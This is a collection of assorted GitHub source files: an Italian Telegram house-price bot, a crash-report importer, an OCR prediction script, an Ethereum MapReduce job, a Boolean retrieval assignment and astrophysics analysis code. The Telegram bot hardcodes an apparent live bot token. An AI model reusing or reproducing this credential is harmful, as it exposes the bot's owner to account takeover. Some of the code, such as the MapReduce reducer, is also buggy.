di garage che ha la tua casa?\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 3:\n numgarage = update.message.text\n if numgarage.isdigit():\n context.user_data['garage'] = int(numgarage)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci i mq catastali e quelli calpestabili dell'abitazione separati dalla virgola\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci un numero intero.\")\n elif context.user_data['dati_inviati'] == 4:\n land = update.message.text\n if ',' in land:\n landarea, floor = land.split(',')\n context.user_data['land_area'] = landarea.strip()\n context.user_data['floor_area'] = floor.strip()\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserire anno di costruzione\")\n context.user_data['dati_inviati'] += 1\n else:\n 
context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci la virgola.\")\n elif context.user_data['dati_inviati'] == 5:\n build = update.message.text\n if build.isdigit():\n context.user_data['anno'] = int(build)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci la distanza dal centro\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 6:\n distcentro = update.message.text\n if distcentro.isdigit():\n context.user_data['distanza'] = int(distcentro)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci il nome e la distanza della stazione più vicina separati dalla virgola\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 7:\n statio = update.message.text\n if ',' in statio:\n neastn, neastndist = statio.split(',')\n context.user_data['nomestazione'] = neastn.strip()\n context.user_data['distanzastazione'] = neastndist.strip()\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci anno dell'ultima vendita della casa\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Non hai inserito la virgola.\")\n elif context.user_data['dati_inviati'] == 8:\n datesold = update.message.text\n if datesold.isdigit():\n context.user_data['datavendita'] = int(datesold)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserire il codice postale\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 9:\n postcode = update.message.text\n if postcode.isdigit():\n context.user_data['codicepostale'] = int(postcode)\n #keyboard = [[InlineKeyboardButton(\"Invia posizione\", request_location=True)]]\n #reply_markup = InlineKeyboardMarkup(keyboard)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci la tua latitudine.\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 10:\n user_location = update.message.text\n context.user_data['latitude'] = int(user_location)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci la tua longitudine\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 11:\n longitude = update.message.text\n context.user_data['longitude'] = int(longitude)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci il nome e la distanza della scuola più vicina separati dalla virgola\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 12:\n scuolaa = update.message.text\n if ',' in scuolaa:\n nearestsch, nearestschdist = scuolaa.split(',')\n context.user_data['nomescuola'] = nearestsch.strip()\n context.user_data['distanzascuola'] = nearestschdist.strip()\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il grado della scuola\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Non hai inserito la virgola.\")\n 
elif context.user_data['dati_inviati'] == 13:\n nearestschgrade = update.message.text\n if nearestschgrade.isdigit():\n context.user_data['grado'] = int(nearestschgrade)\n dictionary = {'ADDRESS' : context.user_data['via'],\n 'SUBURB' : context.user_data['sobborgo'],\n 'BEDROOMS' : context.user_data['camere'],\n 'BATHROOMS' : context.user_data['bagni'],\n 'GARAGE' : context.user_data['garage'],\n 'LAND_AREA' : context.user_data['land_area'],\n 'FLOOR_AREA' : context.user_data['floor_area'],\n 'BUILD_YEAR' : context.user_data['anno'],\n 'CBD_DIST' : context.user_data['distanza'],\n 'NEAREST_STN' : context.user_data['nomestazione'],\n 'NEAREST_STN_DIST' : context.user_data['distanzastazione'],\n 'DATE_SOLD' : context.user_data['datavendita'],\n 'POSTCODE': context.user_data['codicepostale'],\n 'LATITUDE': context.user_data['latitude'],\n 'LONGITUDE': context.user_data['longitude'],\n 'NEAREST_SCH': context.user_data['nomescuola'],\n 'NEAREST_SCH_DIST': context.user_data['distanzascuola'],\n 'NEAREST_SCH_RANK': context.user_data['grado']}\n df = pd.DataFrame(dictionary, index=[0])\n df['ADDRESS'] = df['ADDRESS'].astype(\"category\", errors='raise').cat.codes\n df['SUBURB'] = df['SUBURB'].astype(\"category\", errors='raise').cat.codes\n df['NEAREST_STN'] = df['NEAREST_STN'].astype(\"category\", errors='raise').cat.codes\n df['DATE_SOLD'] = df['DATE_SOLD'].astype(\"category\", errors='raise').cat.codes\n df['NEAREST_SCH'] = df['NEAREST_SCH'].astype(\"category\", errors='raise').cat.codes\n context.user_data['dati_inviati'] = 0\n file = open('modello', 'rb')\n modello = pickle.load(file)\n risultato = modello.predict(df)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Il prezzo è\" + str(risultato))\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n\n\n# main\nif __name__ == '__main__':\n # token del bot\n TOKEN = \"6181502382:AAFroZvfszc6PFydtBosUKrEurgyvuSIDek\"\n # creazione dell'oggetto bot\n bot = telegram.Bot(TOKEN)\n\n # creazione dell'updater\n updater = Updater(TOKEN, use_context=True)\n\n # aggiunta dei gestori di comando e di messaggi di testo\n updater.dispatcher.add_handler(CommandHandler('start', start))\n updater.dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, text_message))\n\n # avvio del bot\n updater.start_polling()\n updater.idle()","repo_name":"samu0411/PredizioneCase","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10125,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"86279477301","text":"from datetime import datetime\nfrom email.utils import parsedate_to_datetime\nfrom hashlib import sha256\n\nfrom .message import Message\n\n\nclass DatabaseEntry:\n def __init__(self, rfc822_message):\n self.message = Message(rfc822_message)\n\n # from is just needed for calculating the SHA256 hash below\n self.from_ = rfc822_message[\"from\"]\n self.to = rfc822_message[\"to\"]\n\n self.plaintext = self.message.plaintext\n self.newpipe_exception_info = self.message.embedded_json\n\n try:\n # try to use the date given by the crash report\n self.date = datetime.strptime(\n self.newpipe_exception_info[\"time\"], \"%Y-%m-%d %H:%M\"\n )\n if self.date.year < 2010:\n raise ValueError()\n except ValueError:\n # try to use the date from the mail header\n self.date = parsedate_to_datetime(rfc822_message[\"date\"])\n if self.date.year < 2010:\n self.date = self.message.date_from_received_headers()\n 
print(self.date)\n\n def to_dict(self):\n # we don't store the From header, as it's not needed for potential re-imports of the database, but could be\n # used to identify the senders after a long time\n # in fact, senders weren't stored in the production system either, but this never got committed to the\n # repository... D'oh!\n return {\n \"to\": self.to,\n \"timestamp\": int(self.date.timestamp()),\n \"plaintext\": self.plaintext,\n \"newpipe-exception-info\": self.newpipe_exception_info,\n }\n\n def hash_id(self):\n hash = sha256((str(self.from_) + str(self.to)).encode())\n hash.update(self.date.strftime(\"%Y%m%d%H%M%S\").encode())\n return hash.hexdigest()\n\n def __hash__(self):\n return hash((self.from_, self.to, self.date))\n","repo_name":"TeamNewPipe/CrashReportImporter","sub_path":"newpipe_crash_report_importer/database_entry.py","file_name":"database_entry.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"42564304652","text":"import sys\n\ninput = sys.stdin.readline\n\nMAX_NUM = 9998\n\nprimes = [False, False] + [True] * (MAX_NUM-1)\nfor i in range(2, MAX_NUM+1):\n if primes[i]:\n for j in range(2*i, MAX_NUM+1, i):\n primes[j] = False\n\nfor _ in range(int(input())):\n n = int(input())\n for i in range(n//2, MAX_NUM+1):\n if primes[i] and primes[n-i]:\n print(n-i, i)\n break","repo_name":"jsbin0526/boj","sub_path":"9020.py","file_name":"9020.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33068139237","text":"import argparse\nimport glob\nimport json\nimport os\nimport numpy as np\nfrom typing import Generator, List, Callable, Optional, Union\n\nimport tqdm\n\nfrom ocr4all_pixel_classifier.lib.dataset import DatasetLoader, SingleData\nfrom ocr4all_pixel_classifier.lib.postprocess import vote_connected_component_class\nfrom ocr4all_pixel_classifier.lib.predictor import Predictor, PredictSettings, Prediction\nfrom ocr4all_pixel_classifier.scripts.generate_image_map import load_image_map_from_file\n\n\ndef glob_all(filenames):\n return [g for f in filenames for g in glob.glob(f)]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--load\", type=str, required=True,\n help=\"Model to load\")\n parser.add_argument(\"--char_height\", type=int, required=False,\n help=\"Average height of character m or n, ...\")\n parser.add_argument(\"--target_line_height\", type=int, default=6,\n help=\"Scale the data images so that the line height matches this value (must be the same as in training)\")\n parser.add_argument(\"--output\", required=True,\n help=\"Output dir\")\n parser.add_argument(\"--binary\", type=str, required=True, nargs=\"+\",\n help=\"directory name of the binary images\")\n parser.add_argument(\"--images\", type=str, required=True, nargs=\"+\",\n help=\"directory name of the images on which to train\")\n parser.add_argument(\"--norm\", type=str, required=False, nargs=\"+\",\n help=\"directory name of the norms on which to train\")\n parser.add_argument(\"--keep_low_res\", action=\"store_true\",\n help=\"keep low resolution prediction instead of rescaling output to orignal image size\")\n parser.add_argument(\"--cc_majority\", action=\"store_true\",\n help=\"classify all pixels of each connected component as most frequent class\")\n parser.add_argument(\"--color_map\", type=str, required=True,\n help=\"color_map to load\")\n 
parser.add_argument(\"--gpu_allow_growth\", action=\"store_true\")\n args = parser.parse_args()\n\n os.makedirs(args.output, exist_ok=True)\n\n image_file_paths = sorted(glob_all(args.images))\n binary_file_paths = sorted(glob_all(args.binary))\n\n norm_file_paths = sorted(glob_all(args.norm)) if args.norm else []\n\n if len(image_file_paths) != len(binary_file_paths):\n raise Exception(\"Got {} images but {} binary images\".format(len(image_file_paths), len(binary_file_paths)))\n\n print(\"Loading {} files with character height {}\".format(len(image_file_paths), args.char_height))\n\n if not args.char_height and len(norm_file_paths) == 0:\n raise Exception(\"Either char height or norm files must be provided\")\n\n if args.char_height:\n line_heights = [args.char_height] * len(image_file_paths)\n elif len(norm_file_paths) == 1:\n line_heights = [json.load(open(norm_file_paths[0]))[\"char_height\"]] * len(image_file_paths)\n else:\n if len(norm_file_paths) != len(image_file_paths):\n raise Exception(\"Number of norm files must be one or equals the number of image files\")\n line_heights = [json.load(open(n))[\"char_height\"] for n in norm_file_paths]\n\n post_processors = []\n if args.cc_majority:\n post_processors += [vote_connected_component_class]\n\n image_map = load_image_map_from_file(args.color_map)\n\n predictions = predict(args.output,\n binary_file_paths,\n image_file_paths,\n image_map,\n line_heights,\n target_line_height=args.target_line_height,\n model=args.load,\n high_res_output=not args.keep_low_res,\n post_processors=post_processors,\n gpu_allow_growth=args.gpu_allow_growth,\n )\n\n for _, _ in tqdm.tqdm(enumerate(predictions)):\n pass\n\n\ndef predict(output,\n binary_file_paths: List[str],\n image_file_paths: List[str],\n color_map: dict,\n line_heights: Union[List[int], int],\n target_line_height: int,\n model: str,\n high_res_output: bool = True,\n post_processors: Optional[List[Callable[[np.ndarray, SingleData], np.ndarray]]] = None,\n gpu_allow_growth: bool = False,\n ) -> Generator[Prediction, None, None]:\n dataset_loader = DatasetLoader(target_line_height, prediction=True, color_map=color_map)\n\n if type(line_heights) is int:\n line_heights = [line_heights] * len(image_file_paths)\n\n data = dataset_loader.load_data(\n [SingleData(binary_path=b, image_path=i, line_height_px=n)\n for b, i, n in zip(binary_file_paths, image_file_paths, line_heights)]\n )\n\n settings = PredictSettings(\n network=os.path.abspath(model),\n output=output,\n high_res_output=high_res_output,\n post_process=post_processors,\n color_map=color_map,\n n_classes=len(color_map),\n gpu_allow_growth=gpu_allow_growth,\n )\n predictor = Predictor(settings)\n\n return predictor.predict(data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OMMR4all/ommr4all-page-segmentation","sub_path":"ocr4all_pixel_classifier/scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"6584812102","text":"from mrjob.job import MRJob\nimport time\nimport re\n\nclass ForktheChain(MRJob):\n\n def mapper(self, _, line):\n fields = line.split(\",\")\n chosen_timeframe = False\n try:\n if (len(fields)==7):\n value = int(fields[3])\n destination_address = str(fields[2])\n\n date = int(fields[6])\n timeformatting = time.strftime(\"%d %b %Y\", time.gmtime(date))\n\n start_time = time.strptime(\"23 Nov 2016\", \"%d %b %Y\")\n end_time = time.strptime(\"23 Jan 2017\", \"%d %b 
%Y\")\n\n if (start_time <= time.gmtime(date) and time.gmtime(date) <= end_time):\n chosen_timeframe = True\n else:\n chosen_timeframe = False\n\n if not (destination_address == \"null\" or value == 0):\n if (chosen_timeframe == True):\n yield(timeformatting, (destination_address, value))\n except:\n pass\n\n\n\n def reducer(self, date, values):\n for x in values:\n totalvalue = totalvalue + int(x[1])\n val0 = x[0]\n yield(val0, ('{},{}'.format(totalvalue, date)))\n\n\nif __name__ == '__main__':\n ForktheChain.JOBCONF = {'mapreduce.job.reduces': '25'}\n ForktheChain.run()\n","repo_name":"usmanjameel1/Analysis-of-Ethereum-Transactions-and-Smart-Contracts","sub_path":"ForktheChain.py","file_name":"ForktheChain.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32327283695","text":"import re\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.tokenize import word_tokenize\r\nfrom tkinter import *\r\nfrom PIL import ImageTk,Image\r\n\r\n\r\nclass Boolean_retrieval:\r\n \r\n positional_index={}\r\n inverted_index={}\r\n stopwords=[]\r\n \r\n def __init__(self):\r\n #initializing stopwords to the class variable returned from stopwords function\r\n self.stopwords=self.readstopword() \r\n \r\n #reading stop words from file\r\n def readstopword(self):\r\n #Reading Stopwords from Stopwords file\r\n f=open(\"Stopword.txt\",\"r\")\r\n stwd=f.read()\r\n #Removing 'Spaces\" and \\n from the words and making a list\r\n stwd=stwd.replace(\" \",\"\")\r\n stwd=stwd.split(\"\\n\")\r\n f.close()\r\n # return the stop words\r\n return stwd\r\n \r\n #reading the file and removing special characters and converting to lower case\r\n def treat_file(self,num):\r\n #Reading from File\r\n f = open(\"Abstracts\\\\\" +str(num)+\".txt\",\"r\")\r\n file1=f.read()\r\n #Removing numbers and special chanacters and converting to lower case\r\n file1=re.sub('[^A-Za-z0-9]+', ' ', file1).lower()\r\n f.close()\r\n return file1\r\n #removing stop words from the provided list\r\n def filter_stopwords(self,file_words,sw):\r\n #removing stop words in this function\r\n filtered_words=[]\r\n for words in file_words:\r\n if words not in sw:\r\n filtered_words.append(words) \r\n return filtered_words\r\n #applying stemming to the applied list and neglecting the words with length < 1\r\n def apply_stemming(self,filtered_words):\r\n # apply poter stemming from builtin library nltk\r\n ps = PorterStemmer()\r\n stemmed_list=[]\r\n for words in filtered_words:\r\n if(len(ps.stem(words))>1):\r\n stemmed_list.append(ps.stem(words))\r\n return stemmed_list\r\n \r\n #storing the file list in inverted index\r\n def Inverted_index(self,st_word,num):\r\n #creating inverted index from a set of list of words\r\n for word in st_word:\r\n if word not in self.inverted_index:\r\n self.inverted_index[word]=[num]\r\n elif word in self.inverted_index:\r\n self.inverted_index[word].append(num)\r\n \r\n #processing and creating inverted index the the entire 449 files by applying steeming,\r\n #removing stop words by calling the above functions\r\n def Create_Inverted_index(self):\r\n for x in range(1,449):\r\n file_words=[]\r\n \r\n #reading the file and cleaning it\r\n file_paragraph=self.treat_file(x)\r\n #removing numbers to\r\n file_paragraph=re.sub('[^A-Za-z]+', ' ', file_paragraph).lower()\r\n file_words=file_paragraph.split()\r\n \r\n filter_stop=[]\r\n #removing stop words\r\n filter_stop=self.filter_stopwords(file_words,self.stopwords)\r\n 
stem_list=[]\r\n #applying stemming\r\n stem_list=self.apply_stemming(filter_stop)\r\n #removing duplicates\r\n stem_list=list(dict.fromkeys(stem_list))\r\n #Creating inverted index\r\n self.Inverted_index(stem_list, x)\r\n \r\n #storing the inverted index in file\r\n f = open(\"inverted_index.txt\", \"w\")\r\n for key in sorted(self.inverted_index):\r\n f.write(key + '->' +str(self.inverted_index[key])+'\\n')\r\n f.close()\r\n\r\n \r\n #Performing Intersection or we can say AND operation between 2 list\r\n def andoperation(self,t1,t2):\r\n iresult=[value for value in t1 if value in t2]\r\n return iresult\r\n \r\n #PErforming not operation\r\n def notoperation(self,t1):\r\n iresult=[]\r\n for id in range (1,449):\r\n if id not in t1:\r\n iresult.append(id)\r\n return iresult\r\n \r\n \r\n #Performing Or operation\r\n def oroperation(self,t1,t2):\r\n iresult=sorted(list(set(t1) | set(t2)))\r\n return iresult\r\n \r\n #processing boolean queries and search from inverted index \r\n def boolean_query_process(self,query):\r\n #processing the boolean query\r\n ps = PorterStemmer()\r\n #defining the list of boolean operators\r\n operator_list=['AND','OR','NOT']\r\n #MAking a list of the querys and splitting the querry into tokens\r\n query_list=query.split()\r\n \r\n #applying stemming to query terms except boolean operators\r\n temp_dict={}\r\n \r\n for x in range (0,len(query_list)):\r\n if query_list[x] not in operator_list:\r\n word=query_list[x]\r\n query_list[x]=ps.stem(word.lower())\r\n temp_dict[query_list[x]]=self.inverted_index[query_list[x]]\r\n \r\n result=[]\r\n #checking the if the first term is a term and not a boolean query\r\n #storing the term as result so we can process linearly onwords\r\n if(query_list[0] != 'NOT'): \r\n result=temp_dict[query_list[0]]\r\n else:\r\n #if the first term is not operator \r\n result=self.notoperation(temp_dict[query_list[1]])\r\n for x in range (0,len(query_list)-1): \r\n n1=[]\r\n if(query_list[x] == 'AND'):\r\n if(query_list[x+1]=='NOT'):\r\n n1=self.notoperation(temp_dict[query_list[x+2]])\r\n result=self.andoperation(result, n1)\r\n else:\r\n result=self.andoperation(result,temp_dict[query_list[x+1]])\r\n elif(query_list[x]=='OR'):\r\n if(query_list[x+1]=='NOT'):\r\n n1=self.notoperation(temp_dict[query_list[x+2]])\r\n result=self.oroperation(result, n1)\r\n else:\r\n result=self.oroperation(result,temp_dict[query_list[x+1]])\r\n \r\n return result\r\n \r\n \r\n #creating positional index of the 449 file provided and treating the document from above methods\r\n def Create_positional_index(self):\r\n \r\n for doc_id in range (1,449):\r\n \r\n file_words=[]\r\n #reading the file and cleaning it\r\n file_paragraph=self.treat_file(doc_id)\r\n file_words=file_paragraph.split()\r\n ps = PorterStemmer()\r\n for x in range (0,len(file_words)):\r\n file_words[x]=ps.stem(file_words[x]) \r\n #Condition to check if the words are not stop words & numbers and their length > 1 \r\n if((file_words[x] not in self.stopwords) and (file_words[x].isnumeric()==False) and len(file_words[x])>1):\r\n \r\n #Now creating positional index\r\n if file_words[x] not in self.positional_index:\r\n self.positional_index[file_words[x]]={}\r\n self.positional_index[file_words[x]][doc_id]=[]\r\n self.positional_index[file_words[x]][doc_id].append(x+1)\r\n else:\r\n if doc_id not in self.positional_index[file_words[x]]:\r\n self.positional_index[file_words[x]][doc_id]=[]\r\n self.positional_index[file_words[x]][doc_id].append(x+1)\r\n else: \r\n 
self.positional_index[file_words[x]][doc_id].append(x+1)\r\n \r\n \r\n #storing the positional index in File\r\n f = open(\"positional_index.txt\", \"w\")\r\n for key in sorted(self.positional_index):\r\n f.write(key + '->' +str(self.positional_index[key])+'\\n') \r\n f.close()\r\n\r\n \r\n #processing the queries and searching in positional index\r\n def proximity_queries(self,query):\r\n ps = PorterStemmer()\r\n #creating tokens of the query\r\n query_list=word_tokenize(query)\r\n new_list=[]\r\n temp_dict={}\r\n result=[]\r\n \r\n #PRocessing the proximity query\r\n for word in query_list: \r\n word=ps.stem(word)\r\n if('/' in word): \r\n #Removing / from the digit\r\n new_list.append(word.strip('/'))\r\n else:\r\n new_list.append(word)\r\n temp_dict[word]=self.positional_index[word]\r\n \r\n \r\n #Fetching result \r\n for n in range (0,len(new_list)):\r\n if new_list[n].isdigit() == True:\r\n distance=int(new_list[n])+1\r\n for key in temp_dict[new_list[n-2]]:\r\n #checking the common documentids for both terms\r\n if key in temp_dict[new_list[n-1]]:\r\n #getting list of of locations of the terms from both of the document ids\r\n l1=temp_dict[new_list[n-2]][key]\r\n l2=temp_dict[new_list[n-1]][key]\r\n for x in range (0,len(l1)):\r\n for y in range (0,len(l2)):\r\n if(abs(l1[x]-l2[y])<=distance):\r\n result.append(key)\r\n \r\n #Removing duplicate documents \r\n result=list(dict.fromkeys(result))\r\n return result\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#checking if the query is boolean or proximity\r\ndef check_query(query):\r\n operator='/'\r\n result=[]\r\n if operator in query:\r\n result= p1.proximity_queries(query)\r\n else:\r\n result= p1.boolean_query_process(query)\r\n #storing the output in file\r\n f=open(\"Outputfile.txt\",\"a\")\r\n f.write('Query is: '+ query + '\\n' + 'Result=>'+str(result) +'\\n')\r\n f.close()\r\n \r\n return result\r\n \r\n#this function is called when search button is pressed in GUI \r\ndef search():\r\n output.delete(\"1.0\",\"end\")\r\n output.insert(END,\"Terms found in Documents:\"+str(check_query(input1.get())))\r\n \r\n \r\n \r\np1=Boolean_retrieval()\r\n#creating inverted and positional index\r\nprint(\"Creating boolean and positional index\")\r\np1.Create_Inverted_index()\r\np1.Create_positional_index()\r\n\r\n\r\n#Making GUI\r\n#In TKinter to place a widget in any where on the screen we can use pack,place or grid\r\n\r\nwindow =Tk()\r\n\r\nwindow.title(\"Boolean Retireval Model Assignment-1\")\r\nwindow.minsize(width=700,height=800)\r\n\r\n#Padding the window and setting the Background Color\r\nwindow.config(padx=50,bg='#B7CADB')\r\n\r\n#Setting image\r\ncanvas=Canvas(width=724,height=501,bg='#B7CADB',highlightthickness=0)\r\nimg=PhotoImage(file=\"img1.png\")\r\ncanvas.create_image(362,250, image=img)\r\n\r\n#Roll no text field\r\nmy_label=Label(text=\"K19-0178 A-1 \",font=(\"Arial\",24),bg='#B7CADB')\r\nmy_label.place(relx=0.5,rely=0.55,anchor=\"center\")\r\n\r\n#Asking for query text field\r\nmy_label=Label(text=\"Enter Query: \",font=(\"Arial\",24,\"bold\"),bg='#B7CADB')\r\nmy_label.place(relx=0.5,rely=0.6,anchor=\"center\")\r\n\r\n\r\n#input field \r\ninput1=Entry(width=50,font=(\"Arial\",15))\r\ninput1.place(relx=0.5,rely=0.65,anchor=\"center\")\r\n\r\n#Button field\r\nbutton=Button(text=\"Search\",command=search,width=10,height=1,bg='#6FB2D2')\r\nbutton.place(relx=0.5,rely=0.7,anchor=\"center\")\r\n\r\n#Output 
field\r\noutput=Text(height=7,width=69,bg='#B7CADB')\r\noutput.insert(END,\"\")\r\noutput.place(relx=0.12,rely=0.75)\r\n\r\ncanvas.pack()\r\nwindow.mainloop()\r\n\r\n\r\n\r\n","repo_name":"ZainShakir/Boolean-Retrieval-Model---IR","sub_path":"k19_0178 A-1.py","file_name":"k19_0178 A-1.py","file_ext":"py","file_size_in_byte":11689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74175167869","text":"# coding:utf-8\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n#解题思路:二叉树层次遍历,实际上就是广度优先搜索BFS,遇到这种问题考虑使用辅助队列,辅助队列中\n#存储需处理的元素及其优先顺序\nclass Solution:\n # 返回从上到下每个节点值列表,例:[1,2,3]\n def PrintFromTopToBottom(self, root):\n # write code here\n queue = []\n res =[]\n if root is None:\n return []\n queue.append(root)\n while queue:\n node = queue.pop(0)\n res.append(node.val)\n if node.left!=None:\n queue.append(node.left)\n if node.right!=None:\n queue.append(node.right)\n return res\n\nif __name__ == '__main__':\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(3)\n Solution = Solution()\n print(Solution.PrintFromTopToBottom(root))","repo_name":"xxxsssyyy/offer-Goal","sub_path":"22从上往下打印二叉树.py","file_name":"22从上往下打印二叉树.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"23608904874","text":"#Calculate the relationship between quenching time, stellar mass, and distance to host, replicating Weisz+ 2015, Figure 1\n\n#Run with\n#%run /home/christensen/Code/python/python_analysis/quench_v_distance.py\n#or, on quirm,\n#%run /home/christenc/Code/python/python_analysis/quench_v_distance.py\n#ipython --pylab\n\nimport matplotlib as mpl\nmpl.use('tkagg')\nimport numpy as np\nimport pynbody\nimport socket\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys, os, glob, pickle\nfrom scipy.interpolate import interp1d\nimport matplotlib.colors as colors\nimport matplotlib.gridspec as gridspec\n#import pickle_read\n#import distance_to_nearest_host\n\n# Read in a pickled data file for python 3\ndef pickle_read(file):\n\n objs = []\n f=open(file, 'rb')\n while 1:\n try:\n u = pickle._Unpickler(f)\n u.encoding = 'latin1'\n p = u.load()\n objs.append(p)\n #objs.append(pickle.load(f))\n except EOFError:\n break\n \n f.close()\n\n return pd.DataFrame(objs)\n\n# Matches the halos in the objs_pd file with the halo information from Ferah (m200)\n# see \"match_halos.py\" for development\ndef match_halos(objs_pd, fdmdata):\n smass_tol = 0.5 #fractional tolerance for the stellar mass\n vmass_tol = 0.9\n\n match_id = {'m200_haloid': 0}\n if not 'm200_haloid' in objs_pd.keys():\n objs_pd = objs_pd.join(pd.DataFrame(columns=match_id))\n \n for sim in pd.unique(objs_pd['sim']):\n objs_pd_sim = objs_pd[objs_pd['sim'] == sim].copy()\n for halo in np.sort(objs_pd_sim['haloid']):\n possible_match = (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['M_star']) < fdmdata[fdmdata['simname']==sim]['Mstar_z0']*(1 + smass_tol)) & (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['M_star']) > fdmdata[fdmdata['simname']==sim]['Mstar_z0']*(1 - smass_tol))& (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['mass']) < fdmdata[fdmdata['simname']==sim]['Mhalo_z0']*(1 + vmass_tol)) & (float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['mass']) > fdmdata[fdmdata['simname']==sim]['Mhalo_z0']*(1 - vmass_tol))\n if sum(possible_match) == 0:\n print(sim, halo, 'XXX', float(objs_pd[(objs_pd['sim'] == sim) & 
(objs_pd['haloid'] == halo)]['M_star']), float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['mass']), 'No Match')\n            else:\n                #print(fdmdata[fdmdata['simname']==sim][possible_match]['halogrp_z0'])\n                arg_best_match = np.argmin(np.abs(fdmdata[fdmdata['simname']==sim][possible_match]['Mstar_z0'] - float(objs_pd_sim[objs_pd_sim['haloid'] == halo]['M_star'])))\n                index_best_match = (fdmdata[fdmdata['simname']==sim][possible_match]).index[arg_best_match]\n                objs_pd.loc[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo),'m200_haloid'] = fdmdata.loc[index_best_match]['halogrp_z0']\n                #print(sim, halo, fdmdata.loc[index_best_match]['halogrp_z0'], float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['M_star']), fdmdata.loc[index_best_match]['Mstar_z0'], float(objs_pd[(objs_pd['sim'] == sim) & (objs_pd['haloid'] == halo)]['mass']), fdmdata.loc[index_best_match]['Mhalo_z0'])\n                fdmdata.loc[index_best_match,'Mstar_z0'] = 0 #set stellar mass to zero so it is not matched again\n\n    return objs_pd\n    \n#Calculates the distance to the nearest massive galaxy\ndef distance_to_nearest_host(tfiles,data):\n    distances = []\n    hostrvirs = []\n    min_massiveHalo = 10**11.5\n    sprev = ''\n    tfile_it = -1 \n    for i in range(len(data)):\n        s = data['sim'].tolist()[i]\n\n        print(s,data['haloid'].tolist()[i]) \n        if s=='h148' or s=='h229' or s=='h242' or s=='h329': # if sat simulation, find distance to halo 1\n            if s != sprev:\n                tfile_it = tfile_it + 1\n                sprev = s\n            h1dist = data['h1dist'].tolist()[i]*0.6776942783267969\n            distances.append(h1dist)\n            \n            h1rvir = data['Rvir'][(data.sim==s) & (data.haloid==1)].tolist()[0]*0.6776942783267969\n            hostrvirs.append(h1rvir)\n            \n        else: # if field simulation, find distance to nearest massive DM halo (currently > 10**11.5 Msol)\n            if s=='cptmarvel':\n                path = '/home/akinshol/Data/Sims/cptmarvel.cosmo25cmb.4096g5HbwK1BH/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096.dir/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096'\n\n            if s=='elektra':\n                path = '/home/akinshol/Data/Sims/elektra.cosmo25cmb.4096g5HbwK1BH/elektra.cosmo25cmb.4096g5HbwK1BH.004096.dir/elektra.cosmo25cmb.4096g5HbwK1BH.004096'\n\n            if s=='rogue':\n                path = 